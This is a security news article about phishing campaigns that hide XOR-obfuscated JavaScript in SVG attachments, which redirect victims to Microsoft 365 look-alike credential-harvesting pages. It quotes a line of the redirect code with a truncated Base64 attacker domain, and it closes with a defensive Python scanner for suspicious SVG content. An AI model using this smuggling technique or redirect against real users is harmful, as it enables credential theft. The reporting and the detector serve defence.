Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript
Threat actors are quietly turning Scalable Vector Graphics (SVG) files into precision-guided malware. In a surge of phishing campaigns, seemingly innocuous .svg attachments slip past secure email gateways because mail filters regard them as static images.
Once the recipient merely previews the file, hidden JavaScript executes inside the browser, triggering an invisible redirect chain that funnels victims to attacker infrastructure.

The lure emails are minimalist—often a single icon or “Missed Call” teaser—and exploit organisations that have weak SPF, DKIM or DMARC enforcement.
As the attachments bypass signature checks, the first line of defence fails; Ontinue analysts identified the wave after correlating near-identical SVGs sent to B2B service providers and SaaS vendors, all containing distinct Base64 tracking strings that map each click to a workstation.
Since no executable is dropped, endpoint agents see only normal browser activity while credentials are siphoned off on well-crafted Microsoft 365 look-alike portals.

Beyond credential theft, the technique exemplifies a broader strategic pivot: adversaries increasingly weaponise file formats that browsers render natively, removing the social-engineering friction of persuading users to run macros or installers.
Security controls that focus on executables, archives or scripts alone find themselves blind to these pixel-perfect stings.
Infection Mechanism: Self-Decoding JavaScript Smuggling
Each malicious SVG embeds an obfuscated payload between <script> tags. A ten-byte XOR key masks the script, frustrating static scanners, while a two-stage routine reconstructs the redirect at runtime.
First, a short function iterates through the encrypted blob, returning plaintext; then it leverages the Function constructor to execute that code entirely in memory.
The revived script concatenates an atob()-decoded domain with a victim-specific token before forcing navigation:

```javascript
window.location.href = atob(
  'aHR0cHM6Ly93dnJ6LmxmdGt2b2cubmV0L...' // domain rotates daily
) + token;
```
As nothing is written to disk, persistence is irrelevant, and geofencing logic ensures sandboxes outside the target region receive benign pages.
Detecting the threat therefore hinges on deep content inspection that flags script tags inside image files or on correlating unusual .svg command-line invocations with email telemetry.
Until such controls mature, organisations should quarantine unsolicited SVGs, enable content disarm and reconstruction, and move DMARC policies from monitoring to reject.
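One way to implement the deep content inspection described above, as an added example (not code from the article, Ontinue or any vendor): a small Python scanner that parses an SVG attachment and flags script elements, event-handler attributes, javascript: URLs, foreignObject and long Base64-like blobs. The function name scan_svg and the two sample files are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Hypothetical detector for SVG attachments (added example, not the article's code).
# Long runs of Base64-looking text are a hint of a smuggled, self-decoding payload.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/=]{40,}")


def scan_svg(data: bytes) -> list[str]:
    """Return a list of findings for one SVG document; empty means nothing suspicious."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Malformed files are worth a second look too, so report rather than ignore.
        return [f"unparseable SVG ({exc})"]
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower()  # strip the XML namespace prefix
        if tag == "script":
            findings.append("embedded <script> element")
            if BASE64_BLOB.search(el.text or ""):
                findings.append("long Base64-like blob inside <script>")
        if tag == "foreignobject":
            findings.append("<foreignObject> (can carry HTML/scripts)")
        for attr, value in el.attrib.items():
            name = attr.split("}")[-1].lower()  # also catches xlink:href
            if name.startswith("on"):
                findings.append(f"event handler attribute {name}")
            if name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: URL in href")
    return findings


# Constructed samples (not real campaign files): a plain image and one with
# an onload handler plus a script holding a Base64-looking string.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
SUSPICIOUS_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" onload="init()">'
    b'<script>var k="' + b"QUJDREVGRw" * 5 + b'";</script></svg>'
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, scan_svg(blob) or "clean")
```

A mail gateway or CDR step would quarantine any attachment whose findings list is non-empty rather than treating the file as a static image.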
The post Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript appeared first on Cyber Security News.
Tushar Subhra Dutta